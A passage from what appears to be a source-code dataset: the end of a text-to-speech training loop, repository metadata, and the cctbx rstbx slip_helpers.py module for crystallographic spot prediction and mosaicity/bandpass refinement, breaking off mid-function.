text, src_len, mel_len, D, f0, energy, max_src_len, max_mel_len)
# Cal Loss
mel_loss, mel_postnet_loss, d_loss, f_loss, e_loss = Loss(
log_duration_output, log_D, f0_output, f0, energy_output, energy, mel_output, mel_postnet_output, mel_target, ~src_mask, ~mel_mask)
total_loss = mel_loss + mel_postnet_loss + d_loss + f_loss + e_loss
# Logger
t_l = total_loss.item()
m_l = mel_loss.item()
m_p_l = mel_postnet_loss.item()
d_l = d_loss.item()
f_l = f_loss.item()
e_l = e_loss.item()
with open(os.path.join(log_path, "total_loss.txt"), "a") as f_total_loss:
f_total_loss.write(str(t_l)+"\n")
with open(os.path.join(log_path, "mel_loss.txt"), "a") as f_mel_loss:
f_mel_loss.write(str(m_l)+"\n")
with open(os.path.join(log_path, "mel_postnet_loss.txt"), "a") as f_mel_postnet_loss:
f_mel_postnet_loss.write(str(m_p_l)+"\n")
with open(os.path.join(log_path, "duration_loss.txt"), "a") as f_d_loss:
f_d_loss.write(str(d_l)+"\n")
with open(os.path.join(log_path, "f0_loss.txt"), "a") as f_f_loss:
f_f_loss.write(str(f_l)+"\n")
with open(os.path.join(log_path, "energy_loss.txt"), "a") as f_e_loss:
f_e_loss.write(str(e_l)+"\n")
# Backward
total_loss = total_loss / hp.acc_steps
total_loss.backward()
if current_step % hp.acc_steps != 0:
continue
# Clipping gradients to avoid gradient explosion
nn.utils.clip_grad_norm_(model.parameters(), hp.grad_clip_thresh)
# Update weights
scheduled_optim.step_and_update_lr()
scheduled_optim.zero_grad()
# Print
if current_step % hp.log_step == 0:
Now = time.perf_counter()
str1 = "Epoch [{}/{}], Step [{}/{}]:".format(
epoch+1, hp.epochs, current_step, total_step)
str2 = "Total Loss: {:.4f}, Mel Loss: {:.4f}, Mel PostNet Loss: {:.4f}, Duration Loss: {:.4f}, F0 Loss: {:.4f}, Energy Loss: {:.4f};".format(
t_l, m_l, m_p_l, d_l, f_l, e_l)
str3 = "Time Used: {:.3f}s, Estimated Time Remaining: {:.3f}s.".format(
(Now-Start), (total_step-current_step)*np.mean(Time))
print("\n" + str1)
print(str2)
print(str3)
with open(os.path.join(log_path, "log.txt"), "a") as f_log:
f_log.write(str1 + "\n")
f_log.write(str2 + "\n")
f_log.write(str3 + "\n")
f_log.write("\n")
train_logger.add_scalar('Loss/total_loss', t_l, current_step)
train_logger.add_scalar('Loss/mel_loss', m_l, current_step)
train_logger.add_scalar('Loss/mel_postnet_loss', m_p_l, current_step)
train_logger.add_scalar('Loss/duration_loss', d_l, current_step)
train_logger.add_scalar('Loss/F0_loss', f_l, current_step)
train_logger.add_scalar('Loss/energy_loss', e_l, current_step)
if current_step % hp.save_step == 0:
torch.save({'model': model.state_dict(), 'optimizer': optimizer.state_dict(
)}, os.path.join(checkpoint_path, 'checkpoint_{}.pth.tar'.format(current_step)))
print("save model at step {} ...".format(current_step))
if current_step % hp.synth_step == 0:
length = mel_len[0].item()
mel_target_torch = mel_target[0, :length].detach().unsqueeze(0).transpose(1, 2)
mel_target = mel_target[0, :length].detach().cpu().transpose(0, 1)
mel_torch = mel_output[0, :length].detach().unsqueeze(0).transpose(1, 2)
mel = mel_output[0, :length].detach().cpu().transpose(0, 1)
mel_postnet_torch = mel_postnet_output[0, :length].detach().unsqueeze(0).transpose(1, 2)
mel_postnet = mel_postnet_output[0, :length].detach().cpu().transpose(0, 1)
Audio.tools.inv_mel_spec(mel, os.path.join(synth_path, "step_{}_griffin_lim.wav".format(current_step)))
Audio.tools.inv_mel_spec(mel_postnet, os.path.join(synth_path, "step_{}_postnet_griffin_lim.wav".format(current_step)))
if hp.vocoder == 'melgan':
utils.melgan_infer(mel_torch, melgan, os.path.join(hp.synth_path, 'step_{}_{}.wav'.format(current_step, hp.vocoder)))
utils.melgan_infer(mel_postnet_torch, melgan, os.path.join(hp.synth_path, 'step_{}_postnet_{}.wav'.format(current_step, hp.vocoder)))
utils.melgan_infer(mel_target_torch, melgan, os.path.join(hp.synth_path, 'step_{}_ground-truth_{}.wav'.format(current_step, hp.vocoder)))
elif hp.vocoder == 'waveglow':
utils.waveglow_infer(mel_torch, waveglow, os.path.join(hp.synth_path, 'step_{}_{}.wav'.format(current_step, hp.vocoder)))
utils.waveglow_infer(mel_postnet_torch, waveglow, os.path.join(hp.synth_path, 'step_{}_postnet_{}.wav'.format(current_step, hp.vocoder)))
utils.waveglow_infer(mel_target_torch, waveglow, os.path.join(hp.synth_path, 'step_{}_ground-truth_{}.wav'.format(current_step, hp.vocoder)))
f0 = f0[0, :length].detach().cpu().numpy()
energy = energy[0, :length].detach().cpu().numpy()
f0_output = f0_output[0, :length].detach().cpu().numpy()
energy_output = energy_output[0, :length].detach().cpu().numpy()
utils.plot_data([(mel_postnet.numpy(), f0_output, energy_output), (mel_target.numpy(), f0, energy)],
['Synthetized Spectrogram', 'Ground-Truth Spectrogram'], filename=os.path.join(synth_path, 'step_{}.png'.format(current_step)))
if current_step % hp.eval_step == 0:
model.eval()
with torch.no_grad():
d_l, f_l, e_l, m_l, m_p_l = evaluate(model, current_step)
t_l = d_l + f_l + e_l + m_l + m_p_l
val_logger.add_scalar('Loss/total_loss', t_l, current_step)
val_logger.add_scalar('Loss/mel_loss', m_l, current_step)
val_logger.add_scalar('Loss/mel_postnet_loss', m_p_l, current_step)
val_logger.add_scalar('Loss/duration_loss', d_l, current_step)
val_logger.add_scalar('Loss/F0_loss', f_l, current_step)
val_logger.add_scalar('Loss/energy_loss', e_l, current_step)
model.train()
end_time = time.perf_counter()
Time = np.append(Time, end_time - start_time)
if len(Time) == hp.clear_Time:
temp_value = np.mean(Time)
Time = np.delete(
Time, [i for i in range(len(Time))], axis=None)
Time = np.append(Time, temp_value)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--restore_step', type=int, default=0)
args = parser.parse_args()
main(args)
| 51.349794
| 166
| 0.563552
|
ff61aae3f4c0fd99f2bc79b8f89f7abc6e439d72
| 52,588
|
py
|
Python
|
rstbx/apps/slip_helpers.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
rstbx/apps/slip_helpers.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
rstbx/apps/slip_helpers.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
from six.moves import range
import math
from libtbx.test_utils import approx_equal
from scitbx.array_family import flex
from scitbx import lbfgs
class minimizer(object):
def __init__(self,data,stuff,frame,max_iterations=50):
self.n = len(data)
self.values = data
self.initial = data.deep_copy()
#mosaicity,hi energy wave, lo energy wave
#want mosaicity between 0.1 and 1.0 of input value.
self.lower_bound = flex.double([0.1*data[0],0.98*data[1],(data[1]+data[2])/2.])
upper_bound = flex.double([10.*data[0],(data[1]+data[2])/2.,1.02*data[2]])
mean_value = (upper_bound - self.lower_bound)/2.
self.full_range = upper_bound - self.lower_bound
starting_params = flex.tan(math.pi*(((data - self.lower_bound)/self.full_range)-0.5))
self.x = starting_params.deep_copy()
print("staerting params",list(self.x))
self.stuff = stuff
self.frame = frame
# optimize parameters
self.minimizer = lbfgs.run(target_evaluator=self,
termination_params = lbfgs.termination_parameters(max_calls=20))
def compute_functional_and_gradients(self):
print("trying",list(self.x))
# try to constrain rather than restrain. Use arctan function to get this right
# minimizer can choose any value from -inf to inf but we'll keep values carefully in range
# mos
#if self.x[0]/self.initial[0] >2.: self.x[0]=2.*self.initial[0]
#assert self.x[1]<self.x[2]
#if self.x[1]/self.initial[1] <0.99: self.x[1]=0.99*self.initial[1]
#if self.x[2]/self.initial[2] >1.01: self.x[2]=1.01*self.initial[2]
#print "adjust",list(self.x)
def get_score(x):
unpacked = self.lower_bound + self.full_range*(
0.5 + (flex.atan(x)/math.pi)
)
#print " trying",list(unpacked)
return self.stuff.use_case_3_score_only(
self.frame,unpacked[0],unpacked[1],unpacked[2])
#f = self.stuff.use_case_3_score_only(
# self.frame,self.values[0],self.values[1],self.values[2])
f = get_score(self.x)
gradients = flex.double(len(self.x))
for i in range(self.n):
#factors = [1.000]*self.n
# factors[i] *= 1.001
# D_i = 0.001 * self.x[i]
#f_i_plus_D_i = self.stuff.use_case_3_score_only(
# self.frame,self.x[0]*factors[0],self.x[1]*factors[1],self.x[2]*factors[2])
trial_x = self.x.deep_copy()
trial_x[i]+=1.
f_i_plus_D_i = get_score(trial_x)
df_di = (f_i_plus_D_i - f)/1.
gradients[i]=df_di
return f,gradients
def unpacked(self,x):
return self.lower_bound + self.full_range*(
0.5 + (flex.atan(x)/math.pi)
)
class wrapper_of_use_case_bp3(object):
def __init__(self, raw_image, spotfinder, imageindex, inputai, spot_prediction_limiting_resolution,
phil_params, sub=None):
"""MODEL: polychromatic beam with top hat bandpass profile.
isotropic mosaicity with top hat half-width; spots are brought into reflecting condition
by a finite rotation about the axis that is longitudinal to the projection of the q-vector
onto the detector plane.
"""
from rstbx.bandpass import use_case_bp3,parameters_bp3
from scitbx.matrix import col
from math import pi
from cctbx.crystal import symmetry
self.detector_origin = col((-inputai.getBase().xbeam, -inputai.getBase().ybeam, 0.))
crystal = symmetry(unit_cell=inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = spot_prediction_limiting_resolution)
parameters = parameters_bp3(
indices=indices.indices(), orientation=inputai.getOrientation(),
incident_beam=col((0.,0.,-1.)),
packed_tophat=col((1.,1.,0.)),
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((raw_image.pixel_size,raw_image.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=inputai.getBase().distance,
detector_origin=self.detector_origin
)
if phil_params.integration.subpixel_joint_model.translations is not None:
T = phil_params.integration.subpixel_joint_model.translations
import copy
resortedT = copy.copy(T)
for tt in range(0,len(T),2):
resortedT[tt] = T[tt+1]
resortedT[tt+1] = T[tt]
from rstbx.apps.dual_resolution_helpers import get_model_ref_limits
model_refinement_limiting_resolution = get_model_ref_limits(self,raw_image,spotfinder,
imageindex,inputai,spot_prediction_limiting_resolution)
print("resolution limits: model refinement %7.2f spot prediction %7.2f"%(
model_refinement_limiting_resolution,spot_prediction_limiting_resolution))
self.ucbp3 = use_case_bp3(parameters=parameters)
the_tiles = raw_image.get_tile_manager(phil_params).effective_tiling_as_flex_int(
reapply_peripheral_margin=True,encode_inactive_as_zeroes=True)
self.ucbp3.set_active_areas( the_tiles )
if phil_params.integration.signal_penetration==0.0:
self.ucbp3.set_sensor_model( thickness_mm = 0.0, mu_rho = 8.36644, signal_penetration = 0.0 )
else: self.ucbp3.set_sensor_model( thickness_mm = 0.5, mu_rho = 8.36644, # CS_PAD detector at 1.3 Angstrom
signal_penetration = phil_params.integration.signal_penetration)
# XXX still very buggy; how do penetration & thickness relate?
if sub != None and phil_params.integration.subpixel_joint_model.translations is not None:
raise Exception("Cannot use both subpixel mechanisms simultaneously")
elif sub != None:
print("Subpixel corrections: using translation-pixel mechanism")
null_rotations_deg = flex.double(len(sub)//2)
self.ucbp3.set_subpixel(flex.double(sub),rotations_deg=null_rotations_deg)
elif phil_params.integration.subpixel_joint_model.translations is not None:
print("Subpixel corrections: using joint-refined translation + rotation")
self.ucbp3.set_subpixel(
resortedT, rotations_deg = flex.double(
phil_params.integration.subpixel_joint_model.rotations)
)
else:
print("Subpixel corrections: none used")
# Reduce Miller indices to a manageable set. NOT VALID if the crystal rotates significantly
self.ucbp3.prescreen_indices(inputai.wavelength)
# done with Miller set reduction
from annlib_ext import AnnAdaptorSelfInclude as AnnAdaptor
body_pixel_reference = flex.double()
limited_body_pixel_reference = flex.double()
for spot in spotfinder.images[imageindex]["goodspots"]:
for pxl in spot.bodypixels:
body_pixel_reference.append(pxl.y + 0.5)
body_pixel_reference.append(pxl.x + 0.5)
pixel_center = col((pxl.x,pxl.y,0.0))*raw_image.pixel_size
offs = self.detector_origin+pixel_center
radius_mm = math.hypot(offs[0],offs[1])
pixel_two_theta_rad = math.atan(radius_mm/inputai.getBase().distance)
pixel_d_ang = ( inputai.wavelength / (2.*math.sin (pixel_two_theta_rad/2.)) )
if pixel_d_ang > model_refinement_limiting_resolution:
limited_body_pixel_reference.append(pxl.y + 0.5)
limited_body_pixel_reference.append(pxl.x + 0.5)
self.model_refinement_limiting_resolution = model_refinement_limiting_resolution
# model refinement resolution limits must be applied in two places: 1) the reference
# list of body pixels to the ann adaptor, and 2) the enclosed_pixels_and_margin_pixels() function call
if self.model_refinement_limiting_resolution > 0.:
self.ucbp3.set_adaptor(limited_body_pixel_reference)
else:
self.ucbp3.set_adaptor(body_pixel_reference)
def set_variables(self, orientation, wave_HI, wave_LO, half_mosaicity_deg, domain_size=0.):
half_mosaicity_rad = half_mosaicity_deg * math.pi/180.
self.ucbp3.set_mosaicity(half_mosaicity_rad)
self.ucbp3.set_bandpass(wave_HI,wave_LO)
self.ucbp3.set_orientation(orientation)
self.ucbp3.set_domain_size(domain_size)
def score_only(self):
self.ucbp3.picture_fast_slow()
# not sure why x and y origin shifts are swapped here, but this seemed to work
swapped_origin = (-self.detector_origin[1],-self.detector_origin[0],0.)
self.ucbp3.spot_rectangles(swapped_origin)
self.ucbp3.spot_rectregions(swapped_origin,1.0)
if self.model_refinement_limiting_resolution > 0.:
self.ucbp3.enclosed_pixels_and_margin_pixels(self.model_refinement_limiting_resolution)
else:
self.ucbp3.enclosed_pixels_and_margin_pixels()
return self.ucbp3.score_only_detail(weight=50.)
class slip_callbacks:
def slip_callback(self,frame):
#best_params=self.use_case_3_simulated_annealing()
#best_params = self.use_case_3_grid_refine(frame)
#self.inputai.setOrientation(best_params[3])
#self.use_case_3_refactor(frame,best_params[0],best_params[1], best_params[2])
#self.inputai.set_orientation_reciprocal_matrix( (0.001096321006219932, -0.0007452314870693856, 0.007577824826005684, 0.0009042576974140007, -0.010205656871417366, -0.0009746502046169632, 0.012357726864252296, 0.00701297199602489, -0.0005717102325987258))
#self.use_case_3_refactor(frame,0.0995603664049, 1.29155605957, 1.30470696644 )
#self.use_case_3_refactor(frame,0.0995603664049, 1.29155605957, 1.30470696644,domain_size=2000. )
normal = True
# BLUE: predictions
blue_data = []
for ix,pred in enumerate(self.predicted):
if self.BSmasks[ix].keys()==[]:continue
x,y = frame.pyslip.tiles.picture_fast_slow_to_map_relative(
(pred[1]/self.pixel_size) +0.5,
(pred[0]/self.pixel_size) +0.5)
blue_data.append((x,y))
if normal: self.blue_layer = frame.pyslip.AddPointLayer(
blue_data, color="blue", name="<blue_layer>",
radius=2,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
yellow_data = []; cyan_data = []
for imsk in range(len(self.BSmasks)):
smask_keys = self.get_ISmask(imsk)
bmask = self.BSmasks[imsk]
if len(bmask.keys())==0: continue
# CYAN: integration mask
for ks in range(0,len(smask_keys),2):
cyan_data.append(
frame.pyslip.tiles.picture_fast_slow_to_map_relative(
smask_keys[ks+1] + 0.5,smask_keys[ks] + 0.5))
# YELLOW: background mask
for key in bmask.keys():
yellow_data.append(
frame.pyslip.tiles.picture_fast_slow_to_map_relative(
key[1] + 0.5 ,key[0] + 0.5))
if normal: self.cyan_layer = frame.pyslip.AddPointLayer(
cyan_data, color="cyan", name="<cyan_layer>",
radius=1.5,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
if normal: self.yellow_layer = frame.pyslip.AddPointLayer(
yellow_data, color="yellow", name="<yellow_layer>",
radius=1.5,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
red_data = []; green_data = []
for spot in self.spotfinder.images[self.frame_numbers[self.image_number]]["goodspots"]:
# RED: spotfinder spot pixels
for pxl in spot.bodypixels:
red_data.append(
frame.pyslip.tiles.picture_fast_slow_to_map_relative(
pxl.y + 0.5, pxl.x + 0.5))
# GREEN: spotfinder centers of mass
green_data.append(
frame.pyslip.tiles.picture_fast_slow_to_map_relative(
spot.ctr_mass_y() + 0.5, spot.ctr_mass_x() + 0.5))
self.red_layer = frame.pyslip.AddPointLayer(
red_data, color="red", name="<red_layer>",
radius=1.5,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
if normal: self.green_layer = frame.pyslip.AddPointLayer(
green_data, color="green", name="<green_layer>",
radius=1.5,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_1(self,frame):
# A rehash of the spot-prediction algorithm for pedagogical use.
# Use an "ewald proximity" filter as suggested by Ralf.
# aside from a few extra spots due to ewald proximity, this is exactly the
# same spot model developed initially for the Sept/Dec 2011 CXI runs.
orange_data = []
from scitbx.matrix import col,sqr
print("wavelength",self.inputai.wavelength)
print("orientation",self.inputai.getOrientation())
A = sqr(self.inputai.getOrientation().reciprocal_matrix())
print("base",self.inputai.getBase())
print("pixel size",self.pixel_size)
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
detector_fast = col((0.,1.,0.))
detector_slow = col((1.,0.,0.))
distance = self.inputai.getBase().distance
s0 = col((0.,0.,1/self.inputai.wavelength))
s0_length = s0.length()
detector_normal = col((0.,0.,-1.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
for H in indices.indices():
s = A * H
q = (s + s0)
#print q.length(), s0_length
if abs(q.length() - s0_length) > 0.001: continue
q_unit = q.normalize()
# check if diffracted ray parallel to detector face
q_dot_n = q_unit.dot(detector_normal)
if q_dot_n >= 0: continue
r = (q_unit * distance / q_dot_n) - detector_origin
x = r.dot(detector_fast)
y = r.dot(detector_slow)
print(x,y)
orange_data.append( frame.pyslip.tiles.picture_fast_slow_to_map_relative(
(x/self.pixel_size) +0.5,
(y/self.pixel_size) +0.5))
self.orange_layer = frame.pyslip.AddPointLayer(
orange_data, color="orange", name="<orange_layer>",
radius=3.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_2(self,frame):
# Extend the model. Assume monochromatic beam but finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
orange_data = []
from scitbx.matrix import col,sqr
from math import pi
print("Moasicity degrees, half",0.1)
mosaicity_rad = 0.1 * pi/180. #half-width top-hat mosaicity
A = sqr(self.inputai.getOrientation().reciprocal_matrix())
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
detector_fast = col((0.,1.,0.))
detector_slow = col((1.,0.,0.))
distance = self.inputai.getBase().distance
#s0: parallel to the direction of incident radiation
s0 = col((0.,0.,1/self.inputai.wavelength))
s0_length = s0.length()
s0_unit = s0.normalize()
detector_normal = col((0.,0.,-1.))
# Cn, the circular section through the Ewald sphere.
Cncenter = -s0
Cnradius_squared = s0.length_sq()
# Taking a page from mathworld.wolfram.com, calculate the distance d
# between the centers of Co and Cn,
d = s0_length
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
for H in indices.indices():
s = A * H
rotax = s.normalize().cross(s0_unit) #The axis that most directly brings the Bragg spot onto Ewald sphere
s_rad = s.length()
s_rad_sq = s.length_sq()
# take a page from ewald_sphere.cpp, determine intersection of two coplanar circles
# Co, the circle centered on reciprocal origin and containing the point s,
# Cn, the circle centered on -s0 (ewald sphere center) of radius (1/lambda) with normal rotax.
# Consider the intersection of two circles:
# Co, the circle of rotation of H.
# Cocenter = 0; so it falls out of the equations
# The chord of intersection between Co and Cn lies a
# distance x along the (Cocenter - Cncenter) vector
chord_direction = (rotax.cross( - Cncenter)).normalize();
a = s.length_sq()/(2.*s0_length)
b = math.sqrt(s.length_sq() - (a*a)) # Calculate half-length of the chord of intersection
# Two intersection points
intersections_0p = -a * s0_unit+ b*chord_direction
intersections_1p = -a * s0_unit- b*chord_direction
iangle_0= math.acos (intersections_0p.dot(s) / (s_rad_sq))
iangle_1= math.acos (intersections_1p.dot(s) / (s_rad_sq))
assert approx_equal((intersections_0p+s0).length()-s0_length,0. )
if iangle_0 < mosaicity_rad:
intersection = intersections_0p
elif iangle_1 < mosaicity_rad:
intersection = intersections_1p
else: continue
q = (intersection + s0)
q_unit = q.normalize()
# check if diffracted ray parallel to detector face
q_dot_n = q_unit.dot(detector_normal)
if q_dot_n >= 0: continue
print("IANGLES",iangle_0 * 180./pi, iangle_1 * 180./pi)
r = (q_unit * distance / q_dot_n) - detector_origin
x = r.dot(detector_fast)
y = r.dot(detector_slow)
orange_data.append( frame.pyslip.tiles.picture_fast_slow_to_map_relative(
(x/self.pixel_size) +0.5,
(y/self.pixel_size) +0.5))
self.orange_layer = frame.pyslip.AddPointLayer(
orange_data, color="orange", name="<orange_layer>",
radius=3.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_2cpp(self,frame):
from rstbx.bandpass import use_case_bp2_picture_fast_slow
# Extend the model. Assume monochromatic beam but finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
from scitbx.matrix import col
from math import pi
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
picture_fast_slow = use_case_bp2_picture_fast_slow(
indices=indices.indices(), orientation=self.inputai.getOrientation(),
incident_beam=col((0.,0.,1.)), wavelength=self.inputai.wavelength,
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((self.pixel_size,self.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=self.inputai.getBase().distance,
detector_origin=detector_origin,
half_mosaicity_rad=0.1 * pi/180.
)
map_relative = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
self.orange_layer = frame.pyslip.AddPointLayer(
map_relative, color="orange", name="<orange_layer>",
radius=3.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_3cpp(self,frame):
from rstbx.bandpass import use_case_bp3_picture_fast_slow
# Extend the model. Assume polychromatic beam with top hat profile. Assume finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
from scitbx.matrix import col
from math import pi
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
cpp_results = use_case_bp3_picture_fast_slow(
indices=indices.indices(), orientation=self.inputai.getOrientation(),
incident_beam=col((0.,0.,1.)),
#tophat=col((self.inputai.wavelength,self.inputai.wavelength+0.00001,0.1*pi/180.)),
tophat=col((self.inputai.wavelength*0.9975,self.inputai.wavelength*1.0025,0.1*pi/180.)),
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((self.pixel_size,self.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=self.inputai.getBase().distance,
detector_origin=detector_origin
)
picture_fast_slow = cpp_results[0].select(cpp_results[2])
map_relative = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
self.yellow_layer = frame.pyslip.AddPointLayer(
map_relative, color="yellow", name="<yellow_layer>",
radius=3.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
picture_fast_slow = cpp_results[1].select(cpp_results[2])
map_relative = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
self.red_layer = frame.pyslip.AddPointLayer(
map_relative, color="red", name="<red_layer>",
radius=3.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_3box(self,frame):
from rstbx.bandpass import use_case_bp3_picture_fast_slow
# Extend the model. Assume polychromatic beam with top hat profile. Assume finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
from scitbx.matrix import col
from math import pi
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
half_mosaicity_rad = 0.1*pi/180.
cpp_results = use_case_bp3_picture_fast_slow(
indices=indices.indices(), orientation=self.inputai.getOrientation(),
incident_beam=col((0.,0.,1.)),
tophat=col((self.inputai.wavelength*0.9975,self.inputai.wavelength*1.0025,half_mosaicity_rad)),
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((self.pixel_size,self.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=self.inputai.getBase().distance,
detector_origin=detector_origin
)
picture_fast_slow = cpp_results[0].select(cpp_results[2])
map_relative_hi = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
picture_fast_slow = cpp_results[1].select(cpp_results[2])
map_relative_lo = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
# not sure if I've swapped x/y correctly
beam_coor = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(
[(0.5 + self.inputai.getBase().ybeam/self.pixel_size,
0.5 + self.inputai.getBase().xbeam/self.pixel_size)])
polydata = []
beam_pos = col(beam_coor[0])
for idx in range(len(map_relative_hi)):
hi_pos = col(map_relative_hi[idx])
lo_pos = col(map_relative_lo[idx])
radial_vector = (hi_pos-beam_pos)
radial_unit_vec = radial_vector.normalize()
radius = radial_vector.length()
tangential_unit_vec = col((-radial_unit_vec[1],radial_unit_vec[0])) # 90-degree rotation
tangential_excursion = tangential_unit_vec * radius * half_mosaicity_rad
polydata.append( ([(hi_pos + tangential_excursion).elems,
(hi_pos - tangential_excursion).elems,
(lo_pos - tangential_excursion).elems,
(lo_pos + tangential_excursion).elems,
(hi_pos + tangential_excursion).elems
],{}) )
self.red_layer = frame.pyslip.AddPolygonLayer( # needs to be changed for Linux (antialiasing removed)
polydata, color="red", name="<red_layer>",
width=1.0,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_3_refactor(self,frame,half_deg,wave_HI, wave_LO,domain_size=0.):
from rstbx.bandpass import use_case_bp3,parameters_bp3
# Extend the model. Assume polychromatic beam with top hat profile. Assume finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
from scitbx.matrix import col
from math import pi
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
half_mosaicity_rad = half_deg*pi/180.
parameters = parameters_bp3(
indices=indices.indices(), orientation=self.inputai.getOrientation(),
incident_beam=col((0.,0.,1.)),
packed_tophat=col((wave_HI,wave_LO,half_mosaicity_rad)),
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((self.pixel_size,self.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=self.inputai.getBase().distance,
detector_origin=detector_origin
)
cpp_results = use_case_bp3(parameters=parameters)
cpp_results.set_active_areas(
frame.pyslip.tiles.raw_image.get_tile_manager(frame.inherited_params).effective_tiling_as_flex_int(
reapply_peripheral_margin=True))
cpp_results.prescreen_indices(self.inputai.wavelength)
cpp_results.set_domain_size(domain_size)
cpp_results.picture_fast_slow()
picture_fast_slow = cpp_results.hi_E_limit.select(cpp_results.observed_flag)
map_relative_hi = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
picture_fast_slow = cpp_results.lo_E_limit.select(cpp_results.observed_flag)
map_relative_lo = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
poly = cpp_results.spot_rectangles((self.inputai.getBase().ybeam,self.inputai.getBase().xbeam,0.))
map_relative_poly = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(poly)
